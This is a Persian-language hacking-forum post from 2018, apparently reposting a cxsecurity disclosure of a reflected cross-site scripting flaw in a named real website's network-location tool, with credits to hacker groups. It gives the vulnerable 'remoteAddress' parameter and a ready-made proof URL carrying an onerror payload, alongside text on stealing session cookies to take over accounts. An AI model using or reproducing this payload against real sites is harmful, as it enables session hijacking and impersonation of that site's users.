پرش به


تصویر

Yougetsignal.com Cross Site Scripting Vulnerability

انجمن هکران ناشناس ثبت اکسپلویت اسکریپت هک سایت لوکال روت

  • موضوع قفل شده این موضوع قفل شده است
بدون پاسخ

#1 ارسالی 21 ژانویه 2018 - 02:16

GoodBye Hack
+7,219
    OFFLINE
    تاریخ عضویت :
    24 فوریه 2015
  • مدیر کل
  • Leaders
  • 1,924 ارسال
    Last Visit
  • Country :
  • Gender : Male
  • Name : Black

سایت محبوب هکرها :))

https://cxsecurity.com/issue/WLB-2018010207
# Exploit Title: Yougetsignal Cross Site Scripting (Xss) Vulnerability
# Google Dork: N/A
# Date: 2018-01-20
# Exploit Author: Iran.Anonymous
# Vendor Homepage: https://www.yougetsignal.com
# Tested on: Windows
*******************************************
# The impact of this vulnerability :

Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.

# Attack details :

URL encoded POST input { remoteAddress } was set to 37.27.95.133<WRATX4>SCII7[!+!]</WRATX4>

The input is reflected inside a text element.

# The most popular site is exploiters to find sites on the server.

# Proof : 

https://www.yougetsignal.com/tools/network-location/php/get-network-location-json.php?remoteAddress=37.27.95.133%3Cisindex%20type%3dimage%20src%3d1%20onerror%3dprompt(0411)%3E&_=

*******************************************
# Thanks to : ~~> MR.Khatar || Turk.Khan || Blackwolf_Iran ||Ormazd || Sh@d0w ||Hellish_PN (mamad khodesh) ||Rabinson || Danger BoY

# Discovered By: K4an


(-_-)We Are Anonymous(-_-)IM Black.Sec
 

16_cosso.png

 

:excl: به هیچ عنوان به صورت پیام خصوصی به سوالات شما پاسخ داده نخواهد شد :excl:

 

 






همچنین به انجمن هکران ناشناس, ثبت اکسپلویت, اسکریپت, هک سایت, لوکال روت نیز برچسب خورده است

0 کاربر در حال خواندن این موضوع است

0 کاربر، 0 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP